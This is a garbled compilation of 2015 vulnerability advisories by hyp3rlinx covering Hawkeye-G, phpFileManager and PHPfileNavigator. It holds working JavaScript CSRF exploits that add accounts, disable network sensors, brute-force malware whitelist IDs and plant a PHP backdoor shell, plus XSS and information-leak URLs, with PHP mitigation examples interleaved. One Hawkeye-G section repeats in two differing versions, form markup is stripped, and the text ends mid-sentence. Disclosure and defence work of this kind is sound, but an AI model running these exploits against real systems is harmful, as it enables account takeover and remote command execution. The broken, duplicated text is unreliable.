function ghostofsin(){
    var doc=document;
    var e1=doc.getElementById('exploit_1')
    e1.submit()
    var e2=doc.getElementById('exploit_2')
    e2.submit()
    var e3=doc.getElementById('exploit_3')
    e3.submit()
    var e4=doc.getElementById('exploit_4')
    e4.submit()
}

https://localhost:8443/interface/rest/accounts/json"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">

Whitelist MD5 malware IDs CSRF:
-------------------------------
The final CSRF POC, to try and whitelist malware MD5 IDs, is a bit more complex: we need to submit the form many times, hidden in the background using an iframe, so we stay on the same page.

It seems all MD5 IDs end in 0001 and are 8 bytes in length, so we just need a loop to create some numbers 8 bytes long, dynamically assign the 'id' value of the field and execute multiple POST requests in the background. It will be hit or miss unless you know ahead of time the MD5 ID in the database you are targeting.

e.g. Malware MD5 database ID 28240001

So here we go!...

http://www.w3.org/TR/html4/loose.dtd";>
CSRF POC hyp3rlinx
https://localhost:8443/interface/rest/md5-threats/whitelist"; target="demonica" method="post">

var doc=document
var x=1000

function exorcism(){
    x++
    x=x+001
    x=String(x)
    var f=doc.getElementById('hell')
    var e=doc.getElementById('id')
    e.value=x
    f.submit()
}
setInterval("exorcism()",100)

Disclosure Timeline:
====================
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] POST

Vulnerable Product:
[+] Hawkeye-G v3.0.1.4912

Vulnerable Parameter(s):
[+] name, enable, id

Affected Area(s):
[+] Network Threat Appliance, Local Domain
Hawkeye-G v3 CSRF Vulnerability ***[UPDATED CORRECTED]
***[UPDATED CORRECTION] ***

[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt

Vulnerability Type:
===================
CSRF

CVE Reference:
==============
CVE-2015-2878

Vendor:
=======
www.hexiscyber.com

Product:
========
Hawkeye-G v3.0.1.4912
Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network.

Advisory Information:
=====================
Multiple CSRF Vulnerabilities

Vulnerability Details:
======================
1- CSRF Add arbitrary accounts to the system
vulnerable URL: https://localhost:8443/interface/rest/accounts/json
vulnerable POST parameter: 'name'

2- CSRF modification of network sensor settings
a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
vulnerable URL: https://localhost:8443/interface/rest/dpi/setEnabled/1
vulnerable POST parameters: 'url_match' 'dns_inject' 'ip_redirect'

3- CSRF whitelisting of malware MD5 hash IDs
vulnerable URL: https://localhost:8443/interface/rest/md5-threats/whitelist
vulnerable POST parameter: 'id'

CSRF Exploit code(s):
=====================
/* Execute consecutive CSRF exploits */
function ghostofsin(){
    var doc=document;
    var e1=doc.getElementById('exploit_1')
    e1.submit()
    var e2=doc.getElementById('exploit_2')
    e2.submit()
    var e3=doc.getElementById('exploit_3')
    e3.submit()
    var e4=doc.getElementById('exploit_4')
    e4.submit()
}

https://localhost:8443/interface/rest/accounts/json"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">

Whitelist MD5 malware IDs CSRF:
-------------------------------
The final CSRF POC, to try and whitelist malware MD5 IDs, is a bit more complex: we need to submit the form many times, hidden in the background using an iframe, so we stay on the same page.

It seems all MD5 IDs end in 0001 and are 8 bytes in length, so we just need a loop to create some numbers 8 bytes long, dynamically assign the 'id' value of the field and execute multiple POST requests in the background. It will be hit or miss unless you know ahead of time the MD5 ID in the database you are targeting.

e.g. Malware MD5 database ID 28240001

So here we go!...

http://www.w3.org/TR/html4/loose.dtd";>
CSRF POC hyp3rlinx
https://localhost:8443/interface/rest/md5-threats/whitelist"; target="demonica" method="post">

var doc=document
var x=1000
exorcism()

function exorcism(){
    x++
    String(x)
    x+="0001"
    var f=doc.getElementById('hell')
    var e=doc.getElementById('id')
    e.value=x
    x=x.substr(0,4)
    f.submit()
}
setInterval("exorcism()",100)

Disclosure Timeline:
====================
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] POST

Vulnerable Product:
[+] Hawkeye-G v3.0.1.4912

Vulnerable Parameter(s):
[+] name, enable, id

Affected Area(s):
[+] Network Threat Appliance, Local Domain
Hawkeye-G v3.0.1 Persistent XSS & Information Leakage
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0725.txt

Vendor:
=======
www.hexiscyber.com

Product:
========
Hawkeye-G v3.0.1.4912
Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network.

Vulnerability Type:
===================
Persistent XSS & Server Information Leakage

CVE Reference:
==============
N/A

Advisory Information:
=====================
Persistent XSS:
---------------
The Hexis Cyber Hawkeye-G network threat appliance is vulnerable to persistent XSS injection when adding device accounts to the system. The appliance contains an endpoint sensor that collects client information to report back to the Hawkeye-G web interface. When adding device accounts to the system, XSS payloads supplied to the vulnerable parameter 'name' will be stored in the database and executed each time certain threat appliance webpages are visited.

Server Information Disclosure:
------------------------------
We can force internal server 500 errors that leak back-end information. Stack traces are echoed out to the end user instead of being suppressed; this can give attackers valuable information about the system internals, possibly helping them craft more specific types of attacks.

Exploit code(s):
================
Persistent XSS:
---------------
https://localhost:8443/interface/rest/accounts/json"; method="post">

Accessing the following URL will execute the malicious XSS stored in the Hawkeye-G back-end database.
https://localhost:8443/interface/app/#/account-management
vulnerable parameter: 'name'

Server Information Leakage:
---------------------------
These examples will result in 500 internal server error info disclosures:
1- https://localhost:8443/interface/rest/threatfeeds/pagedJson?namePattern=&page=0&size=25&sortCol=address&sortDir=%22/%3E%3Cscript%3Ealert%280%29%3C/script%3E
2- https://localhost:8443/interface/rest/mitigationWhitelist/paged?namePattern=WEB-INF/web.xml&page=0&size=0&source-filter=

Disclosure Timeline:
====================
Vendor Notification: June 30, 2015
July 25, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] POST & GET

Vulnerable Product:
[+] Hawkeye-G v3.0.1.4912

Vulnerable Parameter(s):
[+] name, namePattern, sortDir

Affected Area(s):
[+] Network Threat Appliance
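The general mitigation for the stack-trace leak described above, as an added example. Hawkeye-G is not a PHP product and this is not its code; the example shows the pattern in PHP, the language of the other advisories on this page: the full exception is logged server-side under a random incident id, and the client receives only a generic 500 body carrying that id. The logger callback and all names are assumptions, and the handler returns the response instead of sending it so the script runs offline. Requires PHP 8 for str_contains().

```php
<?php
// Added example, not Hawkeye-G code.  Names are assumptions.

// Build the client-facing response for an unhandled error and hand the
// details to a logger.  The random incident id ties the user-visible
// message to the server-side log entry without revealing anything about
// the failure (class, message, file, line or trace).
function build_error_response(Throwable $e, callable $log): array
{
    $incident = bin2hex(random_bytes(8));
    $log(sprintf("[%s] %s: %s in %s:%d\n%s",
        $incident, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine(),
        $e->getTraceAsString()));
    return [
        'status'  => 500,
        'headers' => ['Content-Type' => 'text/plain; charset=utf-8'],
        'body'    => "Internal server error. Reference: {$incident}\n",
    ];
}

// Wire it in as the last-resort handler.  display_errors stays off so
// PHP's own fatal-error output never reaches the client either.
function install_error_handling(callable $log): void
{
    ini_set('display_errors', '0');
    set_exception_handler(function (Throwable $e) use ($log): void {
        $resp = build_error_response($e, $log);
        http_response_code($resp['status']);
        foreach ($resp['headers'] as $k => $v) {
            header("$k: $v");
        }
        echo $resp['body'];
    });
}

// Constructed failure, logged to an in-memory array instead of error_log()
// so the script can be run from the command line.
$logLines = [];
$log = function (string $line) use (&$logLines): void {
    $logLines[] = $line;
};

try {
    throw new RuntimeException('Unknown sort column requested');
} catch (Throwable $e) {
    $resp = build_error_response($e, $log);
}

echo $resp['body'];
printf("server log holds %d entry; it contains the trace: %s\n",
    count($logLines), str_contains($logLines[0], '#0') ? 'yes' : 'no');
```

The second advisory URL, with WEB-INF/web.xml as a name pattern, is the reason the log line keeps the original message: a defender reviewing the log sees what was asked for, while the client learns only that the request failed.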
phpFileManager 0.9.8 CSRF Backdoor Shell Vulnerability
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt

Vendor:
=======
phpfm.sourceforge.net

Product:
========
phpFileManager version 0.9.8

Vulnerability Type:
===================
CSRF Remote Backdoor Shell

CVE Reference:
==============
N/A

Advisory Information:
=====================
CSRF Remote Backdoor Shell Vulnerability

Vulnerability Details:
======================
PHP File Manager is vulnerable to creation of arbitrary files on the server via CSRF, which we can use to create remote backdoor shell access if the victim clicks our malicious link or visits our malicious webpages.

To create the backdoor shell we need to execute two POST requests:
1- create the PHP backdoor shell 666.php
2- inject code and save it to the backdoor we just created

e.g. https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]

Exploit code(s):
================
var scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)

var maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='"
blasphemer(maliciouso)

function blasphemer(payload){
    var xhr=new XMLHttpRequest()
    xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
    xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
    xhr.send(payload)
}

Disclosure Timeline:
====================
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] POST

Vulnerable Product:
[+] phpFileManager 0.9.8

Vulnerable Parameter(s):
[+] action, cmd_arg, file_data, chmod_arg, save_file

Affected Area(s):
[+] Web Server
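Every CSRF finding on this page (phpLiteAdmin's droptable link, phpSQLiteCMS's add-user, privilege-change and delete-file requests, the Hawkeye-G account and sensor forms, phpFileManager's file creation) has the same root cause: a state-changing request is accepted on the strength of the browser's cookie alone. The gate below is an added example, not code from any of those projects: a synchronizer token stored in the session and compared in constant time, an Origin/Referer check as a second layer, and a refusal to change state on GET at all. The session is reduced to an array and the origin is an assumed value so the functions run outside a web server; the requests at the bottom are constructed to mirror the advisories' request shapes.

```php
<?php
// Added example, not code from phpSQLiteCMS, phpFileManager, phpLiteAdmin
// or Hawkeye-G.  APP_ORIGIN and the array-backed session are assumptions.

const CSRF_TOKEN_KEY = 'csrf_token';
const APP_ORIGIN     = 'https://cms.example.test';   // assumed site origin

// One random token per session, embedded in every form that changes state.
// random_bytes() is CSPRNG-backed; the token never appears in a URL.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_TOKEN_KEY])) {
        $session[CSRF_TOKEN_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_TOKEN_KEY];
}

function csrf_hidden_field(array &$session): string
{
    return '<input type="hidden" name="' . CSRF_TOKEN_KEY . '" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Browsers attach Origin (or at least Referer) to cross-site POSTs, so a
// value from another site is rejected.  A missing header is treated as a
// failure for state-changing requests rather than waved through.
function origin_is_trusted(array $headers): bool
{
    $source = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if ($source === null) {
        return false;
    }
    $p = parse_url($source);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    $origin = strtolower($p['scheme']) . '://' . strtolower($p['host'])
        . (isset($p['port']) ? ':' . $p['port'] : '');
    return $origin === APP_ORIGIN;
}

// The gate every state-changing handler (add user, change role, drop table,
// delete file, whitelist entry, write file) passes through before acting.
function request_is_authorised(array $session, array $post, array $headers, string $method): bool
{
    if ($method !== 'POST') {
        return false;      // no state change on GET: a bare link cannot trigger one
    }
    if (!origin_is_trusted($headers)) {
        return false;
    }
    $expected = $session[CSRF_TOKEN_KEY] ?? '';
    $supplied = $post[CSRF_TOKEN_KEY] ?? '';
    return $expected !== '' && is_string($supplied) && hash_equals($expected, $supplied);
}

// Constructed requests mirroring the advisories: a bare GET link, a POST
// from a foreign page without a token, a POST with a guessed token, and a
// legitimate submission of a form rendered with csrf_hidden_field().
$session = [];
$token   = csrf_token($session);

$cases = [
    'GET droptable link'        => ['GET',  ['droptable' => 'mytable', 'confirm' => '1'], []],
    'foreign POST, no token'    => ['POST', ['mode' => 'users', 'name' => 'x'], ['Origin' => 'https://attacker.example']],
    'foreign POST, wrong token' => ['POST', [CSRF_TOKEN_KEY => 'deadbeef'], ['Origin' => APP_ORIGIN]],
    'legitimate form submit'    => ['POST', [CSRF_TOKEN_KEY => $token], ['Referer' => APP_ORIGIN . '/cms/index.php?mode=users']],
];
foreach ($cases as $label => [$method, $post, $headers]) {
    printf("%-26s -> %s\n", $label,
        request_is_authorised($session, $post, $headers, $method) ? 'allowed' : 'rejected');
}
```

hash_equals() is used instead of `===` so that the comparison time does not depend on how many leading bytes of a guessed token happen to match. The Origin check is deliberately not the only defence: some privacy tools strip Referer, and a missing header is then a rejected request, which is the safe direction to fail in.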
PHPfileNavigator 2.3.3 Persistent & Reflected XSS
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt

Vendor:
=======
pfn.sourceforge.net

Product:
========
PHPfileNavigator v2.3.3 (pfn) is a state-of-the-art, open source web based application to completely manage your files and folders.

Vulnerability Type:
===================
Persistent & Reflected XSS

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form: nome, usuario, email etc...

We can leverage the existing CSRF vulnerability to update a victim's profile and store a malicious XSS payload, or a malicious user can inject their own payloads when updating their profile, affecting other users and the security of the whole application.

Multiple reflected XSS exist as well for the following PHP pages, all with the same vulnerable parameter 'dir' when issuing GET requests.

The pfn-2.3.3 application seems to filter out tags etc, but we can bypass this using
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g. Inject